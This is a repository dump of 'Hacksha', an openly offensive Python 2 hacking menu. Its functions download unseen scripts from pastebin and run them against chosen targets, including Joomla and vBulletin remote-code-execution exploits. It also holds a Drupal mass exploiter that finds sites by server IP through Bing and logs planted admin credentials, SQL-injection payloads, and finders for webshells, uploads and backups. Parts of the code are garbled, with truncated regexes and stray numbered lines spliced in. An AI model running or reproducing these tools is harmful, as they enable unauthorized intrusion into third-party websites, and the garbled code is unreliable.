├── LICENSE
├── README.md
├── hacksha.py
├── install.sh
└── update.sh

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2018 Mr. Shadab Mazhar

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

Hi, I'm Shadab Mazhar!

### Hi 🙋‍♂️,
### I'm an 18-year-old certified ethical hacker, CompTIA Network+ cybersecurity professional and developer from India.

**I am into 🙏**

**Penetration testing, Bug Bounty hunting, Machine Learning, Web Development, Mobile Application Development, Cloud Computing, Linux, System Design & Programming**

*************

### Languages and Tools...

***********************************

#### Thank You-🙏🏼

Shadab The Hacker......

***

# About This Tool

```
Bunch Of Pentesting Tools That All Hackers Need.
```

***

# Getting started

## System requirements

```
Hacksha Framework supports all Unix-based operating systems
```
***

## HackSha Menu :

- Information Gathering
- Password Attacks
- Wireless Testing
- Exploitation Tools
- Sniffing & Spoofing
- Web Hacking
- Private Web Hacking
- Post Exploitation
- Install The HACKSHA

### Information Gathering:

- Nmap
- Setoolkit
- Port Scanning
- Host To IP
- wordpress user
- CMS scanner
- XSStrike
- Dork - Google Dorks Passive Vulnerability Auditor
- Scan A server's Users
- Crips

### Password Attacks:

- Cupp
- Ncrack

### Wireless Testing:

- reaver
- pixiewps
- Fluxion

### Exploitation Tools:

- ATSCAN
- sqlmap
- Shellnoob
- commix
- FTP Auto Bypass
- jboss-autopwn

### Sniffing & Spoofing:

- Setoolkit
- SSLstrip
- pyPISHER
- SMTP Mailer

### Web Hacking:

- Drupal Hacking
- Inurlbr
- Wordpress & Joomla Scanner
- Gravity Form Scanner
- File Upload Checker
- Wordpress Exploit Scanner
- Wordpress Plugins Scanner
- Shell and Directory Finder
- Joomla! 1.5 - 3.4.5 remote code execution
- Vbulletin 5.X remote code execution
- BruteX - Automatically brute force all services running on a target
- Arachni - Web Application Security Scanner Framework

### Private Web Hacking:

- Get all websites
- Get joomla websites
- Get wordpress websites
- Control Panel Finder
- Zip Files Finder
- Upload File Finder
- Get server users
- SQli Scanner
- Ports Scan (range of ports)
- ports Scan (common ports)
- Get server Info
- Bypass Cloudflare

### Post Exploitation:

- Shell Checker
- POET
- Weeman



## HackSha Tool installation

```
> apt-get update -y

> apt-get install python2 -y

> apt-get install git -y

> git clone https://github.com/hackyshadab/Hacksha.git

> cd Hacksha

> chmod +x install.sh

> ./install.sh

> python hacksha.py

```
## HackSha Tool installation (Termux)
```
pkg install git

pkg install python

git clone https://github.com/hackyshadab/Hacksha

cd Hacksha

chmod +x hacksha.py

python2 hacksha.py
```

# Brutexsha Framework disclaimer

```
Usage of the HackSha Framework for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.
```
```
Also, we do not recommend changing the source code of HackSha because -->
it is very complex and you can mess up something and disrupt the framework!
```
## License :

[MIT Licence](https://github.com/hackyshadab/Hacksha/blob/main/LICENSE)

That's It... If You Like This Repository, Please Share It With Your Friends..



***Thank you...***
***Keep Visiting..***
***Enjoy...***
***Shadab The Hacker......***
*******

--------------------------------------------------------------------------------
/hacksha.py:
--------------------------------------------------------------------------------
import sys
import argparse
import os
import time
import httplib
import subprocess
import re
import urllib2
import socket
import urllib
import sys
import json
import telnetlib
import glob
import random
import Queue
import threading
#import requests
import base64
from getpass import getpass
from commands import *
from sys import argv
from platform import system
from urlparse import urlparse
from xml.dom import minidom
from optparse import OptionParser
from time import sleep
##########################
os.system('clear')


def menu():
    print ("""
MIT License
Copyright (c) 2020 HACKSHA by SHADAB
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.""")


os.system('clear')
os.system('clear')
os.system('clear')
os.system('clear')

directories = ['/uploads/', '/upload/', '/files/', '/resume/', '/resumes/', '/documents/', '/docs/', '/pictures/', '/file/', '/Upload/', '/Uploads/', '/Resume/', '/Resume/', '/UsersFiles/', '/Usersiles/', '/usersFiles/', '/Users_Files/', '/UploadedFiles/',
               '/Uploaded_Files/', '/uploadedfiles/', '/uploadedFiles/', '/hpage/', '/admin/upload/', '/admin/uploads/', '/admin/resume/', '/admin/resumes/', '/admin/pictures/', '/pics/', '/photos/', '/Alumni_Photos/', '/alumni_photos/', '/AlumniPhotos/', '/users/']
shells = ['wso.php', 'shell.php', 'an.php', 'hacker.php', 'lol.php', 'up.php', 'cp.php', 'upload.php',
          'sh.php', 'pk.php', 'mad.php', 'x00x.php', 'worm.php', '1337worm.php', 'config.php', 'x.php', 'haha.php']
upload = []
yes = set(['yes', 'y', 'ye', 'Y'])
no = set(['no', 'n'])


def logo():
    print """
- Powered by
__ __ ____ _ _ _ ____ _ ____
| \/ |_ __ / ___|| | | | / \ | _ \ / \ | __ )
| |\/| | '__| \___ \| |_| | / _ \ | | | |/ _ \ | _ \
| | | | | _ ___) | _ |/ ___ \| |_| / ___ \| |_) |
|_| |_|_|(_) |____/|_| |_/_/ \_\____/_/ \_\____/
"""



hackshalogo = """\033[0m
 _   _            _     ____  _
| | | | __ _  ___| | __/ ___|| |__   __ _
| |_| |/ _` |/ __| |/ /\___ \| '_ \ / _` |
|  _  | (_| | (__|   <  ___) | | | | (_| |
|_| |_|\__,_|\___|_|\_\|____/|_| |_|\__,_|
 THE ULTIMATE SOURCE OF HACKING
-----POWERED BY SHADAB THE HACKER........
\033[91m"""
def menu():
    print (hackshalogo + """\033[1m
 [!] This Tool Must Run As ROOT [!] By SHADAB The Hacker.........
\033[0m
 {1}--Information Gathering
 {2}--Password Attacks
 {3}--Wireless Testing
 {4}--Exploitation Tools
 {5}--Sniffing & Spoofing
 {6}--Web Hacking
 {7}--Private Web Hacking
 {8}--Post Exploitation
 {0}--Install The HACKSHA
 {99}-Exit
 """)
    choice = raw_input("hacksha~# ")
    os.system('clear')
    if choice == "1":
        info()
    elif choice == "2":
        passwd()
    elif choice == "3":
        wire()
    elif choice == "4":
        exp()
    elif choice == "5":
        snif()
    elif choice == "6":
        webhack()
    elif choice == "7":
        dzz()
    elif choice == "8":
        postexp()
    elif choice == "0":
        updatehacksha()
    elif choice == "99":
        clearScr(), sys.exit()
    elif choice == "":
        menu()
    else:
        menu()


def updatehacksha():
    print ("This Tool is Only Available for Linux and Similar Systems. ")
    choiceupdate = raw_input("Continue Y / N: ")
    if choiceupdate in yes:
        os.system("git clone https://github.com/hackyshadab/Hacksha.git")
        os.system("cd hacksha && sudo bash ./update.sh")
        os.system("hacksha")


def doork():
    print("doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks. ")
    doorkchice = raw_input("Continue Y / N: ")
    if doorkchice in yes:
        os.system("pip install beautifulsoup4 && pip install requests")
        os.system("git clone https://github.com/AeonDave/doork")
        clearScr()
        doorkt = raw_input("Target : ")
        os.system("cd doork && python doork.py -t %s -o log.log" % doorkt)


def postexp():
    clearScr()
    print(hackshalogo)
    print(" {1}--Shell Checker")
    print(" {2}--POET")
    print(" {3}--Phishing Framework \n")
    print(" {99}-Return to main menu \n\n ")
    choice11 = raw_input("hacksha~# ")
    os.system('clear')
    if choice11 == "1":
        sitechecker()
    if choice11 == "2":
        poet()
    if choice11 == "3":
        weeman()
    elif choice11 == "99":
        menu()


def scanusers():
    site = raw_input('Enter a website : ')
    try:
        users = site
        if 'http://www.' in users:
            users = users.replace('http://www.', '')
        if 'http://' in users:
            users = users.replace('http://', '')
        if '.' in users:
            users = users.replace('.', '')
        if '-' in users:
            users = users.replace('-', '')
        if '/' in users:
            users = users.replace('/', '')
        while len(users) > 2:
            print users
            resp = urllib2.urlopen(
                site + '/cgi-sys/guestbook.cgi?user=%s' % users).read()

            if 'invalid username' not in resp.lower():
                print "\tFound -> %s" % users
                pass

            users = users[:-1]
    except:
        pass


def brutex():
    clearScr()
    print("Automatically brute force all services running on a target : Open ports / DNS domains / Usernames / Passwords ")
    os.system("git clone https://github.com/1N3/BruteX.git")
    clearScr()
    brutexchoice = raw_input("Select a Target : ")
    os.system("cd BruteX && chmod 777 brutex && ./brutex %s" % brutexchoice)


def arachni():
    print("Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications")
    cara = raw_input("Install And Run ? Y / N : ")
    clearScr()
    print("exemple : http://www.target.com/")
    tara = raw_input("Select a target to scan : ")
    if cara in yes:
        os.system("git clone git://github.com/Arachni/arachni.git")
        os.system(
            "cd arachni && sudo gem install bundler && bundle install --without prof && rake install")
        os.system("archani")
    clearScr()
    os.system("cd arachni/bin && chmod 777 arachni && ./arachni %s" % tara)


def XSStrike():
    clearScr()
    print("XSStrike is a python script designed to detect and exploit XSS vulnerabilites. Follow The Owner On Github @UltimateHackers")
    os.system("sudo rm -rf XSStrike")
    os.system("git clone https://github.com/UltimateHackers/XSStrike.git && cd XSStrike && pip install -r requirements.txt && clear && python xsstrike")


def crips():
    clearScr()
    os.system("git clone https://github.com/Manisso/Crips.git")
    os.system("cd Crips && sudo bash ./update.sh")
    os.system("crips")
    os.system("clear")


def weeman():
    print("HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).")
    choicewee = raw_input("Install Weeman ? Y / N : ")
    if choicewee in yes:
        os.system(
            "git clone https://github.com/samyoyo/weeman.git && cd weeman && python weeman.py")
    if choicewee in no:
        menu()
    else:
        menu()


def gabriel():
    print("Abusing authentication bypass of Open&Compact (Gabriel's)")
    os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py")
    clearScr()
    os.system("python gabriel.py")
    ftpbypass = raw_input("Enter Target IP and Use Command :")
    os.system("python gabriel.py %s" % ftpbypass)


def sitechecker():
    os.system("wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py")
    clearScr()
    os.system("python ch01.py")


def h2ip():
    host = raw_input("Select A Host : ")
    ips = socket.gethostbyname(host)
    print(ips)


def ports():
    clearScr()
    target = raw_input('Select a Target IP : ')
    os.system("nmap -O -Pn %s" % target)
    sys.exit()


def ifinurl():
    print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found."""
    print('Do You Want To Install InurlBR ? ')
    cinurl = raw_input("Y/N: ")
    if cinurl in yes:
        inurl()
    if cinurl in no:
        menu()
    elif cinurl == "":
        menu()
    else:
        menu()


def bsqlbf():
    clearScr()
    print("This tool will only work on blind sql injection")
    cbsq = raw_input("select target : ")
    os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
    os.system("perl bsqlbf.pl -url %s" % cbsq)
    os.system("rm bsqlbf.pl")


def atscan():
    print ("Do You To Install ATSCAN ?")
    choiceshell = raw_input("Y/N: ")
    if choiceshell in yes:
        os.system("sudo rm -rf ATSCAN")
        os.system(
            "git clone https://github.com/AlisamTechnology/ATSCAN.git && cd ATSCAN && perl atscan.pl")
    elif choiceshell in no:
        os.system('clear')
        menu()


def commix():
    print ("Automated All-in-One OS Command Injection and Exploitation Tool.")
    print ("usage : python commix.py --help")
    choicecmx = raw_input("Continue: y/n :")
    if choicecmx in yes:
        os.system("git clone https://github.com/stasinopoulos/commix.git commix")
        os.system("cd commix")
        os.system("python commix.py")
        os.system("")
    elif choicecmx in no:
        os.system('clear')
        info()


def pixiewps():
    print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
    """
    choicewps = raw_input("Continue ? Y/N : ")
    if choicewps in yes:
        os.system("git clone https://github.com/wiire/pixiewps.git")
        os.system("cd pixiewps & make ")
        os.system("sudo make install")
    if choicewps in no:
        menu()
    elif choicewps == "":
        menu()
    else:
        menu()


def webhack():
    print(hackshalogo)
    print(" {1}--Drupal Hacking ")
    print(" {2}--Inurlbr")
    print(" {3}--Wordpress & Joomla Scanner")
    print(" {4}--Gravity Form Scanner")
    print(" {5}--File Upload Checker")
    print(" {6}--Wordpress Exploit Scanner")
    print(" {7}--Wordpress Plugins Scanner")
    print(" {8}--Shell and Directory Finder")
    print(" {9}--Joomla! 1.5 - 3.4.5 remote code execution")
    print(" {10}-Vbulletin 5.X remote code execution")
    print(
        " {11}-BruteX - Automatically brute force all services running on a target")
    print(" {12}-Arachni - Web Application Security Scanner Framework \n ")
    print(" {99}-Back To Main Menu \n")
    choiceweb = raw_input("hacksha~# ")
    if choiceweb == "1":
        clearScr()
        maine()
    if choiceweb == "2":
        clearScr()
        ifinurl()
    if choiceweb == '3':
        clearScr()
        wppjmla()
    if choiceweb == "4":
        clearScr()
        gravity()
    if choiceweb == "5":
        clearScr()
        sqlscan()
    if choiceweb == "6":
        clearScr()
        wpminiscanner()
    if choiceweb == "7":
        clearScr()
        wppluginscan()
    if choiceweb == "8":
        clearScr()
        shelltarget()
    if choiceweb == "9":
        clearScr()
        joomlarce()
    if choiceweb == "10":
        clearScr()
        vbulletinrce()
    if choiceweb == "11":
        clearScr()
        brutex()
    if choiceweb == "12":
        clearScr()
        arachni()
    elif choiceweb == "99":
        menu()
    elif choiceweb == "":
        menu()
    else:
        menu()


def vbulletinrce():
    os.system("wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl")
    os.system("perl tmp.pl")


def joomlarce():
    os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py")
    clearScr()
    print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt")
    jmtarget = raw_input("Select a targets list :")
    os.system("python temp.py %s" % jmtarget)


def inurl():
    dork = raw_input("select a Dork:")
    output = raw_input("select a file to save :")
    os.system(
        "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
    if cinurl in no:
        insinurl()
    elif cinurl == "":
        menu()
    else:
        menu()


def insinurl():
    os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
    os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
    os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
    os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php")
    clearScr()
    inurl()


def nmap():

    choice7 = raw_input("continue ? Y / N : ")
    if choice7 in yes:
        os.system("git clone https://github.com/nmap/nmap.git")
        os.system("cd nmap && ./configure && make && make install")
    elif choice7 in no:
        info()
    elif choice7 == "":
        menu()
    else:
        menu()


def jboss():
    os.system('clear')
    print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
    print ("deployed, the script uses its upload and command execution capability to")
    print ("provide an interactive session.")
    print ("")
    print ("usage : ./e.sh target_ip tcp_port ")
    print("Continue: y/n")
    choice9 = raw_input("yes / no :")
    if choice9 in yes:
        os.system(
            "git clone https://github.com/SpiderLabs/jboss-autopwn.git"), sys.exit()
    elif choice9 in no:
        os.system('clear')
        exp()
    elif choice9 == "":
        menu()
    else:
        menu()


def wppluginscan():
    Notfound = [404, 401, 400, 403, 406, 301]
    sitesfile = raw_input("sites file : ")
    filepath = raw_input("Plugins File : ")

    def scan(site, dir):
        global resp
        try:
            conn = httplib.HTTPConnection(site)
            conn.request('HEAD', "/wp-content/plugins/" + dir)
            resp = conn.getresponse().status
        except(), message:
            print "Cant Connect :", message
            pass

    def timer():
        now = time.localtime(time.time())
        return time.asctime(now)

    def main():
        sites = open(sitesfile).readlines()
        plugins = open(filepath).readlines()
        for site in sites:
            site = site.rstrip()
            for plugin in plugins:
                plugin = plugin.rstrip()
                scan(site, plugin)
                if resp not in Notfound:
                    print "+----------------------------------------+"
                    print "| current site :" + site
                    print "| Found Plugin : " + plugin
                    print "| Result:", resp


def sqlmap():
    print ("usage : python sqlmap.py -h")
    choice8 = raw_input("Continue: y/n :")
    if choice8 in yes:
        os.system(
            "git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ")
    elif choice8 in no:
        os.system('clear')
        info()
    elif choice8 == "":
        menu()
    else:
        menu()


def grabuploadedlink(url):
    try:
        for dir in directories:
            currentcode = urllib.urlopen(url + dir).getcode()
            if currentcode == 200 or currentcode == 403:
                print "-------------------------"
                print " [ + ] Found Directory : " + str(url + dir) + " [ + ]"
                print "-------------------------"
                upload.append(url + dir)
    except:
        pass


def grabshell(url):
    try:
        for upl in upload:
            for shell in shells:
                currentcode = urllib.urlopen(upl + shell).getcode()
                if currentcode == 200:
                    print "-------------------------"
                    print " [ ! ] Found Shell : " + str(upl + shell) + " [ ! ]"
                    print "-------------------------"
    except:
        pass


def shelltarget():
    print("exemple : http://target.com")
    line = raw_input("target : ")
    line = line.rstrip()
    grabuploadedlink(line)
    grabshell(line)


def poet():
    print("POET is a simple POst-Exploitation Tool.")
    print("")
    choicepoet = raw_input("y / n :")
    if choicepoet in yes:
        os.system("git clone https://github.com/mossberg/poet.git")
        os.system("python poet/server.py")
    if choicepoet in no:
        clearScr()
        postexp()
    elif choicepoet == "":
        menu()
    else:
        menu()


def setoolkit():
    print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
    print(") designed for social engineering. SET has a number of custom attack vectors that ")
    print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ")
    print("an information security consulting firm located in Cleveland, Ohio.")
    print("")

    choiceset = raw_input("y / n :")
    if choiceset in yes:
        os.system(
            "git clone https://github.com/trustedsec/social-engineer-toolkit.git")
        os.system("python social-engineer-toolkit/setup.py")
    if choiceset in no:
        clearScr()
        info()
    elif choiceset == "":
        menu()
    else:
        menu()


def cupp():
    print("cupp is a password list generator ")
    print("Usage: python cupp.py -h")
    choicecupp = raw_input("Continue: y/n : ")

    if choicecupp in yes:
        os.system("git clone https://github.com/Mebus/cupp.git")
        print("file downloaded successfully")
    elif choicecupp in no:
        clearScr()
        passwd()
    elif choicecupp == "":
        menu()
    else:
        menu()


def ncrack():
    print("A Ruby interface to Ncrack, Network authentication cracking tool.")
    print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
    print("Continue: y/n")
    choicencrack = raw_input("y / n :")
    if choicencrack in yes:
        os.system("git clone https://github.com/sophsec/ruby-ncrack.git")
        os.system("cd ruby-ncrack")
        os.system("install ruby-ncrack")
    elif choicencrack in no:
        clearScr()
        passwd()
    elif choicencrack == "":
        menu()
    else:
        menu()


def reaver():
    print """
 Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
 WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
 wide variety of access points and WPS implementations
 1 to accept / 0 to decline
 """
    creaver = raw_input("y / n :")
    if creaver in yes:
        os.system(
            "apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
        os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
        os.system("cd reaver-wps-fork-t6x/src/ & ./configure")
        os.system("cd reaver-wps-fork-t6x/src/ & make")
    elif creaver in no:
        clearScr()
        wire()
    elif creaver == "":
        menu()
    else:
        menu()


def ssls():
    print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
 attacks.
 It requires Python 2.5 or newer, along with the 'twisted' python module."""
    cssl = raw_input("y / n :")
    if cssl in yes:
        os.system("git clone https://github.com/moxie0/sslstrip.git")
        os.system("sudo apt-get install python-twisted-web")
        os.system("python sslstrip/setup.py")
    if cssl in no:
        snif()
    elif cssl == "":
        menu()
    else:
        menu()


def unique(seq):
    seen = set()
    return [seen.add(x) or x for x in seq if x not in seen]


def bing_all_grabber(s):

    lista = []
    page = 1
    while page <= 101:
        try:
            bing = "http://www.bing.com/search?q=ip%3A" + \
                s + "+&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('

') 1046 | self.portScanner(1, ran) 1047 | elif choice == '10': 1048 | self.portScanner(2, None) 1049 | elif choice == '11': 1050 | self.getServerBanner() 1051 | elif choice == '12': 1052 | self.cloudflareBypasser() 1053 | elif choice == '99': 1054 | menu() 1055 | con = raw_input(' Continue [Y/n] -> ') 1056 | if con[0].upper() == 'N': 1057 | exit() 1058 | else: 1059 | clearScr() 1060 | print menuu 1061 | 1062 | def getSites(self, a): 1063 | """ 1064 | get all websites on same server 1065 | from bing search 1066 | """ 1067 | lista = [] 1068 | page = 1 1069 | while page <= 101: 1070 | try: 1071 | bing = "http://www.bing.com/search?q=ip%3A" + \ 1072 | self.serverip + "+&count=50&first=" + str(page) 1073 | openbing = urllib2.urlopen(bing) 1074 | readbing = openbing.read() 1075 | findwebs = re.findall('

", site + admin
                except IOError:
                    pass
    ############################
    # find ZIP files

    def findZip(self):
        """
        find zip files from grabbed websites
        it may contain useful informations
        """
        zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar',
                   'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
        clearScr()
        print "[~] Finding zip file"
        for site in self.sites:
            for zip1 in zipList:
                try:
                    if urllib.urlopen(site + zip1).getcode() == 200:
                        print " [*] Found zip file -> ", site + zip1
                except IOError:
                    pass

    def findUp(self):
        """
        find upload forms from grabbed
        websites the attacker may succeed to
        upload malicious files like webshells
        """
        upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php',
                  'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
        clearScr()
        print "[~] Finding Upload"
        for site in self.sites:
            for up in upList:
                try:
                    if (urllib.urlopen(site + up).getcode() == 200):
                        html = urllib.urlopen(site + up).readlines()
                        for line in html:
                            if re.findall('type=file', line):
                                print " [*] Found upload -> ", site + up
                except IOError:
                    pass

    def getUsers(self):
        """
        get server users using a method found by
        iranian hackers , the attacker may
        do a bruteforce attack on CPanel, ssh, ftp or
        even mysql if it supports remote login
        (you can use medusa or hydra)
        """
        clearScr()
        print "[~] Grabbing Users"
        userslist = []
        for site1 in self.sites:
            try:
                site = site1
                site = site.replace('http://www.', '')
                site = site.replace('http://', '')
                site = site.replace('.', '')
                if '-' in site:
                    site = site.replace('-', '')
                site = site.replace('/', '')
                while len(site) > 2:
                    resp = urllib2.urlopen(
                        site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
                    if 'invalid username' not in resp.lower():
                        print '\t [*] Found -> ', site
                        userslist.append(site)
                        break
                    else:
                        print site

                    site = site[:-1]
            except:
                pass

        clearScr()
        for user in userslist:
            print user

    def cloudflareBypasser(self):
        """
        trys to bypass cloudflare i already wrote
        in my blog how it works, i learned this
        method from a guy in madleets
        """
        clearScr()
        print "[~] Bypassing cloudflare"
        subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
        for site in self.sites:
            site.replace('http://', '')
            site.replace('/', '')
            try:
                ip = socket.gethostbyname(site)
            except socket.error:
                pass
            for sub in subdoms:
                doo = sub + '.' + site
                print ' [~] Trying -> ', doo
                try:
                    ddd = socket.gethostbyname(doo)
                    if ddd != ip:
                        print ' [*] Cloudflare bypassed -> ', ddd
                        break
                except socket.error:
                    pass

    def getServerBanner(self):
        """
        simply gets the server banner
        the attacker may benefit from it
        like getting the server side software
        """
        clearScr()
        try:
            s = 'http://' + self.serverip
            httpresponse = urllib.urlopen(s)
            print ' [*] Server header -> ', httpresponse.headers.getheader('server')
        except:
            pass

    def grabSqli(self):
        """
        just grabs all websites in server with php?id= dork
        for scanning for error based sql injection
        """
        page = 1
        lista = []
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + \
                    self.serverip + "+php?id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('

<",
                    "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
        check = re.compile(
            "Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
        for url in s:
            try:
                for param in url.split('?')[1].split('&'):
                    for payload in payloads:
                        power = url.replace(param, param + payload.strip())

                        html = urllib2.urlopen(power).readlines()
                        for line in html:
                            checker = re.findall(check, line)
                            if len(checker) != 0:
                                print ' [*] SQLi found -> ', power
            except:
                pass


    def portScanner(self, mode, ran):
        """
        simple port scanner works with range of ports
        or with common ports (al-swisre idea)
        """
        clearScr()
        print "[~] Scanning Ports"

        def do_it(ip, port):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

            sock = sock.connect_ex((ip, port))
            if sock == 0:
                print " [*] Port %i is open" % port

        if mode == 1:
            a = ran.split('-')
            start = int(a[0])
            end = int(a[1])
            for i in range(start, end):
                do_it(self.serverip, i)
        elif mode == 2:
            for port in [80, 21, 22, 2082, 25, 53, 110, 443, 143]:

                do_it(self.serverip, port)


############################
minu = '''
\t 1: Drupal Bing Exploiter
\t 2: Get Drupal Websites
\t 3: Drupal Mass Exploiter
\t 99: Back To Main Menu
'''


def drupal():
    '''Drupal Exploit Binger All Websites Of server '''
    ip = raw_input('1- IP : ')
    page = 1
    while page <= 50:

        url = "http://www.bing.com/search?q=ip%3A" + ip + "&go=Valider&qs=n&form=QBRE&pq=ip%3A" + \
            ip + "&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first=" + \
            str(page)
        req = urllib2.Request(url)
        opreq = urllib2.urlopen(req).read()
        findurl = re.findall(
            '

" + site

                    print "user:HolaKo\npass:admin"
                    a = open('up.txt', 'a')
                    a.write(site + '\n')
                    a.write("user:" + user + "\npass:" + pwd + "\n")
                else:
                    print "[-] Expl Not Found :( "

            except Exception as ex:
                print ex
                sys.exit(0)

        # Drupal Server ExtraCtor


def getdrupal():
    ip = raw_input('Enter The Ip : ')
    page = 1
    sites = list()
    while page <= 50:

        url = "http://www.bing.com/search?q=ip%3A" + ip + \
            "+node&go=Valider&qs=ds&form=QBRE&first=" + str(page)
        req = urllib2.Request(url)
        opreq = urllib2.urlopen(req).read()
        findurl = re.findall(
            '

" + url
                print "[-]username:HolaKo\n[-]password:admin"
                save = open('drupal.txt', 'a')
                save.write(
                    url + "\n" + "[-]username:HolaKo\n[-]password:admin\n")

            else:
                print i + "=> exploit not found "
        except Exception as ex:
            print ex


def maine():

    print minu
    choose = raw_input("choose a number : ")
    while True:

        if choose == "1":
            drupal()
        if choose == "2":
            getdrupal()
        if choose == "3":
            drupallist()
        if choose == "4":
            about()
        if choose == "99":
            menu()
        con = raw_input('Continue [Y/n] -> ')
        if con[0].upper() == 'N':
            exit()
        if con[0].upper() == 'Y':
            maine()


def unique(seq):
    seen = set()
    return [seen.add(x) or x for x in seq if x not in seen]


def bing_all_grabber(s):
    lista = []
    page = 1
    while page <= 101:
        try:
            bing = "http://www.bing.com/search?q=ip%3A" + \
                s + "+&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('

" + sqli)


def sqlscan():
    ip = raw_input('Enter IP -> ')
    grabsqli(ip)


def unique(seq):
    seen = set()
    return [seen.add(x) or x for x in seq if x not in seen]


def bing_all_grabber(s):
    lista = []
    page = 1
    while page <= 101:
        try:
            bing = "http://www.bing.com/search?q=ip%3A" + \
                s + "+&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('

] Press ENTER to Install Hacksha, CTRL+C to Abort.${NC}"
read INPUT
echo ""

# Termux keeps its tree under $PREFIX; other systems use the standard paths.
if [ "$PREFIX" = "/data/data/com.termux/files/usr" ]; then
    INSTALL_DIR="$PREFIX/usr/share/doc/Hacksha"
